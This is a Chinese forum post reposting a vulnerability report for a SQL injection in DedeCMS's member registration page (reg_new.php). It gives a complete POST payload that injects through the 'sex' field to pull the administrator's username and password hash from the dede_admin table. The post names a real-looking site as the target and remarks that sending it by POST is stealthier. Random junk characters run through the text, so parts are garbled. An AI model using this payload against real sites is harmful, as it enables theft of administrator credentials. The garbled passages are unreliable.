漏洞类型: SQL注射漏洞* x! q; n+ d% L+ f4 T: z2 l- E) h
简要描述:9 g D' u, }! Y* P5 ^) Q
* f/ Z' y0 D1 ^/ T: r2 V! c需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.9 }/ U: H7 j. t) m. j
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
( s# B* f8 h# x3 P4 d- P5 _8 p详细说明:跟这个漏洞
3 J, k0 y# t4 r! s5 \* x& [ 1 a& a. k5 n! [6 i/ [& A
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
) R; Y/ N0 }& o! `# L是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.0 c" ~* e& ~& E4 h, K+ _
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
$ p& E5 Z( k" G7 }8 B ' X {' k4 e0 H# U; ~
www.political-security.com/member/reg_new.php2 f* H6 j8 |% r; w% n
7 U5 f2 Z8 V% Z; n3 A- k+ P0 MPOST; _' b$ @; J f* `; Y
" b' l, z' W7 e7 k6 F; sdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&# G- ~, r6 ~1 [2 r6 \" e+ i
userid=c4rp3nt3r&uname=c4rp3nt3r
0 K: L( z1 P2 v Z$ q& o: C" T/ U( i&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss0 f- R2 K. t. `1 _5 X9 _4 h
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
6 g' M' N& m, P(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');% [, _0 }) ?. l( {, v
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对